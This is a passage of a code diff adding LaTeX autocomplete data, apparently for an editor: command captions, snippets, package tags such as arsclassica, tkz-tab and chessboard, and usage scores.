0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'onlyamsmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'onlyamsmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'onlyamsmath-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'onlyamsmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'onlyamsmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'onlyamsmath-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'onlyamsmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'onlyamsmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'onlyamsmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'onlyamsmath-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'onlyamsmath-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'onlyamsmath-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'onlyamsmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'onlyamsmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'onlyamsmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'onlyamsmath-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'onlyamsmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'onlyamsmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'onlyamsmath-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'onlyamsmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'onlyamsmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'onlyamsmath-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'onlyamsmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'onlyamsmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'onlyamsmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'onlyamsmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'onlyamsmath-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'onlyamsmath-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'onlyamsmath-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'onlyamsmath-cmd', + score: 
0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'onlyamsmath-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'onlyamsmath-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'onlyamsmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'onlyamsmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'onlyamsmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'onlyamsmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'onlyamsmath-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'onlyamsmath-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'onlyamsmath-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'onlyamsmath-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'onlyamsmath-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'onlyamsmath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'onlyamsmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'onlyamsmath-cmd', + score: 0.0063276692758974925, + }, + ], + arsclassica: [ + { + caption: '\\spacedlowsmallcaps{}', + snippet: '\\spacedlowsmallcaps{$1}', + meta: 'arsclassica-cmd', + score: 0.002677188251799468, + }, + { + caption: '\\sectionmark', + snippet: '\\sectionmark', + meta: 'arsclassica-cmd', + score: 0.005008938879210868, + }, + { + caption: '\\spacedallcaps{}', + snippet: '\\spacedallcaps{$1}', + meta: 'arsclassica-cmd', + score: 0.0015281000475958944, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'arsclassica-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'arsclassica-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\specialrule{}{}{}', + snippet: '\\specialrule{$1}{$2}{$3}', + meta: 'arsclassica-cmd', + score: 0.004974385202605165, + }, + { + caption: '\\cmidrule', + snippet: '\\cmidrule', + meta: 'arsclassica-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\cmidrule{}', + snippet: '\\cmidrule{$1}', + meta: 'arsclassica-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\bottomrule', + snippet: '\\bottomrule', + meta: 'arsclassica-cmd', + score: 0.04533364657852219, + }, + { + caption: '\\midrule', + 
snippet: '\\midrule', + meta: 'arsclassica-cmd', + score: 0.07098077735912875, + }, + { + caption: '\\addlinespace', + snippet: '\\addlinespace', + meta: 'arsclassica-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\addlinespace[]', + snippet: '\\addlinespace[$1]', + meta: 'arsclassica-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\toprule', + snippet: '\\toprule', + meta: 'arsclassica-cmd', + score: 0.059857788139528495, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'arsclassica-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'arsclassica-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionof{}{}', + snippet: '\\captionof{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.018348594199161503, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'arsclassica-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'arsclassica-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'arsclassica-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'arsclassica-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'arsclassica-cmd', + score: 0.422097569591803, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'arsclassica-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\hspace{}', + snippet: '\\hspace{$1}', + meta: 'arsclassica-cmd', + score: 0.3147206476372336, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'arsclassica-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'arsclassica-cmd', + score: 1.897791904799601, + }, + { + caption: '\\ContinuedFloat', + snippet: '\\ContinuedFloat', + meta: 'arsclassica-cmd', + score: 5.806935368083486e-5, + }, + { + caption: '\\noindent', + snippet: '\\noindent', + meta: 'arsclassica-cmd', + score: 0.42355747798114207, + }, + { + caption: '\\titleclass{}{}[]', + snippet: '\\titleclass{$1}{$2}[$3]', + meta: 'arsclassica-cmd', + score: 0.00028979763314974667, + }, + { + caption: '\\titlelabel{}', + snippet: '\\titlelabel{$1}', + meta: 'arsclassica-cmd', + score: 6.40387839367932e-6, + }, + { + caption: '\\thetitle', + snippet: '\\thetitle', + meta: 'arsclassica-cmd', + score: 0.0015531478302713473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'arsclassica-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'arsclassica-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\titleformat{}{}{}{}{}[]', + snippet: '\\titleformat{$1}{$2}{$3}{$4}{$5}[$6]', + meta: 'arsclassica-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}[]{}{}{}{}', + snippet: '\\titleformat{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'arsclassica-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}{}', + snippet: '\\titleformat{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}{}{}{}{}', + snippet: '\\titleformat{$1}{$2}{$3}{$4}{$5}', + meta: 'arsclassica-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titlespacing{}{}{}{}', + snippet: '\\titlespacing{$1}{$2}{$3}{$4}', + meta: 'arsclassica-cmd', + score: 0.023062744385192156, + }, + { + 
caption: '\\markboth{}{}', + snippet: '\\markboth{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markboth{}', + snippet: '\\markboth{$1}', + meta: 'arsclassica-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markright{}', + snippet: '\\markright{$1}', + meta: 'arsclassica-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\markright{}{}', + snippet: '\\markright{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\filleft', + snippet: '\\filleft', + meta: 'arsclassica-cmd', + score: 7.959989906732799e-5, + }, + { + caption: '\\filcenter', + snippet: '\\filcenter', + meta: 'arsclassica-cmd', + score: 0.0004835660211260246, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'arsclassica-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\cleardoublepage', + snippet: '\\cleardoublepage', + meta: 'arsclassica-cmd', + score: 0.044016804142963585, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'arsclassica-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\chaptertitlename', + snippet: '\\chaptertitlename', + meta: 'arsclassica-cmd', + score: 0.0016985007766926272, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'arsclassica-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\filright', + snippet: '\\filright', + meta: 'arsclassica-cmd', + score: 7.959989906732799e-5, + }, + { + caption: '\\titlerule', + snippet: '\\titlerule', + meta: 'arsclassica-cmd', + score: 0.019273712561461216, + }, + { + caption: '\\titlerule[]{}', + snippet: '\\titlerule[$1]{$2}', + meta: 'arsclassica-cmd', + score: 0.019273712561461216, + }, + { + caption: '\\DeclareCaptionJustification{}{}', + snippet: '\\DeclareCaptionJustification{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\DeclareCaptionLabelSeparator{}{}', + snippet: '\\DeclareCaptionLabelSeparator{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.0003890810058478364, + }, + { + caption: '\\DeclareCaptionFormat{}{}', + snippet: '\\DeclareCaptionFormat{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.0004717618449370015, + }, + { + caption: '\\DeclareCaptionFont{}{}', + snippet: '\\DeclareCaptionFont{$1}{$2}', + meta: 'arsclassica-cmd', + score: 5.0133404990680195e-5, + }, + { + caption: '\\DeclareCaptionSubType[]{}', + snippet: '\\DeclareCaptionSubType[$1]{$2}', + meta: 'arsclassica-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'arsclassica-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'arsclassica-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'arsclassica-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'arsclassica-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'arsclassica-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\DeclareCaptionType{}[][]', + snippet: '\\DeclareCaptionType{$1}[$2][$3]', + meta: 'arsclassica-cmd', + score: 0.00015256647321237863, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'arsclassica-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'arsclassica-cmd', + score: 0.2253056071787701, + }, + { + caption: 
'\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'arsclassica-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'arsclassica-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\marginpar{}', + snippet: '\\marginpar{$1}', + meta: 'arsclassica-cmd', + score: 0.003400158497921723, + }, + { + caption: '\\marginpar', + snippet: '\\marginpar', + meta: 'arsclassica-cmd', + score: 0.003400158497921723, + }, + { + caption: '\\cftsecleader', + snippet: '\\cftsecleader', + meta: 'arsclassica-cmd', + score: 0.0011340882025681251, + }, + { + caption: '\\cftsubsecleader', + snippet: '\\cftsubsecleader', + meta: 'arsclassica-cmd', + score: 1.0644172549700836e-5, + }, + { + caption: '\\spacedlowsmallcaps{}', + snippet: '\\spacedlowsmallcaps{$1}', + meta: 'arsclassica-cmd', + score: 0.002677188251799468, + }, + { + caption: '\\sectionmark', + snippet: '\\sectionmark', + meta: 'arsclassica-cmd', + score: 0.005008938879210868, + }, + { + caption: '\\chaptermark', + snippet: '\\chaptermark', + meta: 'arsclassica-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\chaptermark{}', + snippet: '\\chaptermark{$1}', + meta: 'arsclassica-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\part{}', + snippet: '\\part{$1}', + meta: 'arsclassica-cmd', + score: 0.022180129487444723, + }, + { + caption: '\\tocEntry{}', + snippet: '\\tocEntry{$1}', + meta: 'arsclassica-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\graffito{}', + snippet: '\\graffito{$1}', + meta: 'arsclassica-cmd', + score: 1.1006799670632527e-5, + }, + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'arsclassica-cmd', + score: 0.422097569591803, + }, + { + caption: '\\spacedallcaps{}', + snippet: '\\spacedallcaps{$1}', + meta: 'arsclassica-cmd', + score: 0.0015281000475958944, + }, + { + caption: '\\cftchapleader', + snippet: '\\cftchapleader', + meta: 'arsclassica-cmd', + score: 1.0644172549700836e-5, + }, + { + caption: '\\myVersion', + snippet: '\\myVersion', + meta: 'arsclassica-cmd', + score: 0.00018029288638573757, + }, + { + caption: '\\ctparttext{}', + snippet: '\\ctparttext{$1}', + meta: 'arsclassica-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\addtokomafont{}{}', + snippet: '\\addtokomafont{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.0008555564394100388, + }, + { + caption: '\\setkomafont{}{}', + snippet: '\\setkomafont{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.012985816912639263, + }, + { + caption: '\\KOMAoptions{}', + snippet: '\\KOMAoptions{$1}', + meta: 'arsclassica-cmd', + score: 0.000396664302361659, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'arsclassica-cmd', + score: 2.341195220791228, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'arsclassica-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'arsclassica-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'arsclassica-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'arsclassica-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'arsclassica-cmd', + score: 0.0018957469739775527, + }, + { + caption: 
'\\expandafter', + snippet: '\\expandafter', + meta: 'arsclassica-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'arsclassica-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'arsclassica-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\lsstyle', + snippet: '\\lsstyle', + meta: 'arsclassica-cmd', + score: 0.0023367519914345774, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'arsclassica-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\DisableLigatures[]{}', + snippet: '\\DisableLigatures[$1]{$2}', + meta: 'arsclassica-cmd', + score: 0.0009805246614299932, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'arsclassica-cmd', + score: 0.00021116765384691477, + }, + ], + blkarray: [ + { + caption: '\\small', + snippet: '\\small', + meta: 'blkarray-cmd', + score: 0.2447632045426295, + }, + { + caption: '\\small{}', + snippet: '\\small{$1}', + meta: 'blkarray-cmd', + score: 0.2447632045426295, + }, + ], + 'tkz-tab': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-tab-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-tab-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tkz-tab-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tkz-tab-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tkz-tab-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tkz-tab-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-tab-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tkz-tab-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-tab-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tkz-tab-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-tab-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-tab-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tkz-tab-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'tkz-tab-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'tkz-tab-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.0012203054938872515, + }, + { + 
caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'tkz-tab-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'tkz-tab-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'tkz-tab-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-tab-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-tab-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\reserveinserts{}', + snippet: '\\reserveinserts{$1}', + meta: 'tkz-tab-cmd', + score: 0.0018653410309739879, + }, + { + caption: '\\newtoks', + snippet: '\\newtoks', + meta: 'tkz-tab-cmd', + score: 0.00031058155311734754, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-tab-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tkz-tab-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-tab-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-tab-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tkz-tab-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tkz-tab-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tkz-tab-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-tab-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tkz-tab-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-tab-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tkz-tab-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tkz-tab-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tkz-tab-cmd', + score: 0.2864294797053033, + }, + ], + todo: [ + { + caption: '\\frak{}', + snippet: '\\frak{$1}', + meta: 'todo-cmd', + score: 0.0017966000518546787, + }, + { + caption: '\\checkmark', + snippet: '\\checkmark', + meta: 'todo-cmd', + score: 0.025060530944368123, + }, + { + caption: '\\bold', + snippet: '\\bold', + meta: 'todo-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\bold{}', + snippet: '\\bold{$1}', + meta: 'todo-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\Bbb{}', + snippet: 
'\\Bbb{$1}', + meta: 'todo-cmd', + score: 0.0006671850995492977, + }, + { + caption: '\\Bbb', + snippet: '\\Bbb', + meta: 'todo-cmd', + score: 0.0006671850995492977, + }, + ], + lcg: [ + { + caption: '\\rand', + snippet: '\\rand', + meta: 'lcg-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'lcg-cmd', + score: 0.00037306820619479756, + }, + ], + kantlipsum: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'kantlipsum-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'kantlipsum-cmd', + score: 0.2864294797053033, + }, + ], + chappg: [ + { + caption: '\\pagenumbering{}', + snippet: '\\pagenumbering{$1}', + meta: 'chappg-cmd', + score: 0.06731737633021802, + }, + ], + chessboard: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'chessboard-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'chessboard-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboardfontencoding{}', + snippet: '\\setboardfontencoding{$1}', + meta: 'chessboard-cmd', + score: 0.00014668111964632249, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chessboard-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chessboard-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'chessboard-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'chessboard-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'chessboard-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chessboard-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'chessboard-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chessboard-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'chessboard-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chessboard-cmd', + score: 